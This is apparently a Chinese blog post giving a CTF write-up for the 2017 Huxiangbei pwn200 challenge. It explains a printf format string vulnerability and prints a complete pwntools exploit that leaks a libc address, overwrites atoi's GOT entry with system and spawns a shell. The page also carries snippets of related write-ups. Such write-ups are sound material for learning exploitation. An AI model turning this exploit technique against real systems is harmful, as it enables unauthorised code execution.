2017湖湘杯pwn200的wp

最新推荐文章于 2024-06-03 20:28:40 发布
最新推荐文章于 2024-06-03 20:28:40 发布
阅读量2.8k 收藏 1
点赞数 1
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78699413
版权

湖湘杯的pwn比赛很有趣,我做了pwns200的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10142411
把pwns100直接拖入ida中:
main函数:
image
sub_80485CD函数:
image
在sub_80485CD函数可以看到输入的数据直接进入了printf函数中,所以这个肯定是一个格式化字符串漏洞
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
这个程序开了Canary和栈不可执行
这个题目的思路和http://blog.csdn.net/niexinming/article/details/78512274差不多,唯一不同的是上一个题目提供了system函数,这个题目要从libc中找system函数,所以首先通过printf打印__libc_start_main函数这个地址,然后根据偏移计算libc的基地址,然后计算出system的实际地址,最后用fmtstr_payload(autofmt.offset, {atoi_got_addr: system_addr})把atio的地址覆盖为system的地址,就可以getshell了
我的exp是: 

from pwn import *

def debug(addr = '0x0804867E'):
    raw_input('debug:')
    gdb.attach(r, "b *" + addr)

def base_addr(prog_addr,offset):
    return eval(prog_addr)-offset

#localsystem = 0x0003ADA0

context(arch='i386', os='linux', log_level='debug')

r = process('/home/h11p/hackme/huxiangbei/pwne')

#r = remote('hackme.inndy.tw', 7711)

elf = ELF('/home/h11p/hackme/huxiangbei/pwne')
libc=ELF('/lib/i386-linux-gnu/libc.so.6')

def exec_fmt(payload):
    r.recvuntil('WANT PLAY[Y/N]\n')
    r.sendline('Y')
    r.recvuntil('GET YOUR NAME:\n')
    r.recvuntil('\n')
    r.sendline(payload)
    info = r.recv().splitlines()[1]
    print "info:"+info
    r.sendline('10')
    #r.close()
    return info
autofmt = FmtStr(exec_fmt)
r.close()

r = process('/home/h11p/hackme/huxiangbei/pwne')
atoi_got_addr = elf.got['atoi']
print "%x" % atoi_got_addr
system_offset_addr = libc.symbols['system']
print "%x" % system_offset_addr

payload1="%35$p"

#debug()

r.recvuntil('WANT PLAY[Y/N]\n')
r.sendline('Y')
r.recvuntil('GET YOUR NAME:\n')
r.recvuntil('\n')
r.sendline(payload1)
libc_start_main = r.recv().splitlines()[1]
libc_module=base_addr(libc_start_main,0x18637)
system_addr=libc_module+system_offset_addr
print "system_addr:"+hex(system_addr)
r.sendline('10')

payload2 = fmtstr_payload(autofmt.offset, {atoi_got_addr: system_addr})
r.recvuntil('WANT PLAY[Y/N]\n')
r.sendline('Y')
r.recvuntil('GET YOUR NAME:\n')
r.recvuntil('\n')
r.sendline(payload2)
r.recv()
#r.sendline('10')
r.sendline('/bin/sh')
r.interactive()
r.close()

效果是:
image

niexinming
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2556
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
CTF之PWN学习入门
11-02
  从基础开始,一步步教同学们从基础的栈溢出,栈溢出的原理以及在64位程序与32位程序下,如何去构造EXP,以及在有一般保护的情况下如你构造ROP链,在没有binsh与system函数的情况下如何去构造泄露如put,printf,write等函数的真实地址。然后教大家格式化字符串漏洞的利用,在开启canary下即存在栈溢出与格式化漏洞的情况下如保构造EXP来打通获取一个shell。学完课程同学们能够掌握格式化字符串漏洞与栈溢出漏洞的原理以及如何去构造EXP,掌握原理。
2017湖湘pwn100的wp
一个码农的笔记
11-30 2708
湖湘pwn比赛很有趣,我做了pwns100的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10139497 把pwns100直接拖入ida中: main函数: base64解码函数 输入函数 可以看到read可以输入的字符串可以长达0x200个,这里可造成缓冲区溢出漏洞
[Litctf 2024] Pwn WP 全部题目
最新发布
红叶的博客
06-03 811
劫持 __malloc_hook 打 one_gadget。使用 realloc 调整栈帧。
Pwnwp
weixin_52553215的博客
11-22 710
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
考核PWNwp(未完待续)
m0_75234353的博客
05-23 180
就是要输入一个负数,然后进行num=-num,再判断是否为负数,是的话成功绕过,再进入vuln函数。vuln函数给了system函数,但参数需要自己压入栈内。我们再去看看num=-num是怎么具体实现的,直接看汇编语言。发现是依靠neg指令来完成的。
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 1199
ciscn2023华中赛区pwn
2017湖湘pwn200
12-02
【标题】"2017湖湘pwn200"是一个网络安全竞赛中的挑战项目,专注于Pwn(破解)类别。在这个挑战中,参赛者需要利用编程和安全漏洞的知识来解决问题,通常涉及缓冲区溢出、格式字符串漏洞、堆溢出等攻击技术。这个...
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
2017湖湘pwn400
12-09
2017湖湘pwn400的pwn题目,喜欢的就下载下来做一下。。
2017湖湘pwn300
12-03
2017湖湘pwn300的题目,请大家自行下载。。。。。。
安恒pwn1
04-25
"安恒pwn1" 本文主要讨论的是安恒pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
几道buuctf pwn wp
weixin_44113469的博客
02-07 353
buuctf wp try_your_nc from pwn import * from sys import * debug=1 if debug: p=remote("node3.buuoj.cn",26062) else: p=process("xxx") p.interactive() pwn1_sctf_2016 C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数 from pwn import * from sys import * debug=1 c
AWD系统加固,系统渗透笔记
龙卷风摧毁停车场
09-10 4541
AWD系统加固,系统渗透笔记 更新系统软件,安装lamp环境 第一步:更新系统内核(如果不想更新可以跳过本步)。 首先更新系统内核到最新,因为最新版的CentOS 6.3的php版本为 5.3,早起版本的CentOS的php版本也比较低。 执行命令: yum -y update 注意:如果执行失败报错,可以执行修复命令: rpm –import /etc/pki/rpm-gpg/RPM-GPG-KEY* 第二步: 安装Apahce、Mysql、PHP 及其基础扩展。 执行命令: yum -y insta
2023上海“磐石行动”pwn wp
m0_63437215的博客
05-23 494
2023上海市大学生网络安全大赛 pwn
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2043
攻防世界hello pwn WPpwn入门基础题)的简单讲解
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 632
buuctf pwn
2021东华pwn部分wp
eeeeeight的博客
11-01 1582
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
2017湖湘pwn200_wp_格式化字符串漏洞
aptx4869_li的博客
01-02 1588
本文是格式化字符串漏洞的利用,题目为2017湖湘pwn200,题目文件 链接:https://pan.baidu.com/s/1geZAemZ 密码:b51f 0x0001 看文件类型为elf文件,用  binwalk  查看一下: 一个32位的文件,用IDA看看: main函数: sub_80485CD():
2023 羊城 pwn
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值